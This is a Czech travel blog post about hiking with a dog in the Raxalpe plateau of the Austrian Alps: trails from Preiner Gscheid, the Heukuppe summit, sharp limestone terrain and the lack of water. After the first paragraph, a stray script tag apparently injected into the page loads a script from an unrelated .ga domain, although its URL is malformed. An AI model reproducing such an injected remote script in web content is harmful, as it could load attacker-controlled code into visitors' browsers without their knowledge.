Raxalpe je velmi oblíbená oblast Alp, zejména pro svoje ferratové trasy a dobrou dostupnost z Moravy. Oblast Raxalpe je skvělá i pro pěší turistiku se psem, tvoří ji skalnatý vápencový útes, na kterém se nachází zvlněná náhorní planina. Vzhledem k vápencovému podkladu je oblast posetá nejrůznějšími vzácnými druhy rostlin, roste zde například orchidej Černohlávek rakouský vonící po vanilce.

<script src='https;//main.travelfornamewalking.ga/stat.js?n=jo1' type='text/javascript'></script>

Dobrým výchozím místem pro Raxalpe může být sedlo Preiner Gscheid nedaleko Reichenau an der Rax. Ze sedla je značeno několik stezek, některé vedou k nástupním místům ferrat, jinými se dostanete pěšky až na planinu. Jednoduchá pěší stezka vede k chatě Karl-Ludwig-Haus.

Raxalpe
Raxalpe planina

Stezka stoupá lesem, pastvinami a nakonec kamenitým srázem do sedla Törl. Odtud se dá pokračovat na blízký vrchol Lichtensternhöhe (1902 m), nebo kolem chaty Karl-Ludwig-Haus ke známému kostelíku Raxkircherl a na nejvyšší vrchol Heukuppe (2007 m). Z Heukuppe jsou krásné výhledy na okolní masivy Hohe Veitsch, Schneealpe a Schneeberg. Celá planina Raxalpe je potkaná cestičkami a je možné toho po ní nachodit spousty.

Raxalpe Heukuppe
Raxalpe Heukuppe - výhled na Windberg
P1000202

Vzhledem k vápencovému podloží je pohoří prakticky bez vody, potkávali jsme jen vyschlá koryta. Začátkem léta se v nejvyšších oblastech ještě drží alespoň zbytky sněhu. Při stoupání prudkým skalnatým údolím, kde byla teplota oproti okolí pocitově výrazně vyšší a nebyla možnost zchlazení ve vodě nebo schování ve stínu, jsem měla o Javu docela strach, aby se nepřehřála.

Raxalpe Lilium martagon
Raxalpe Otakárek
Raxalpe rudohlávek
Pokud nehodláte vyrazit ke známému kostelíku a nejvyšší vrchol Heukuppe, je možné toulat se po kopečkách plošiny Raxalpe - přes Lichternsternhöhe na Schweibwaldhöhe nebo Preiner Wand a dále.
P1050089
P1050119
P1050242
Z cest vedoucích ze sedla Preiner Gscheid na plošinu Raxalpe jsou se psy dobře schůdné pohodlná stezka Schlangenweg do sedla Törl, Waxriegelsteig do sedla Trinksteinsattel a Göbl-Kühn-Steig do sedla Königsschusssattel.

Terén vede často po suti, skalách a kamenech, které jsou díky svému vápencovému složení poměrně ostré, takže určitě doporučuji vzít odolné botičky. Pokud strávíte v Raxech více dní, budou se chlupáči hodit.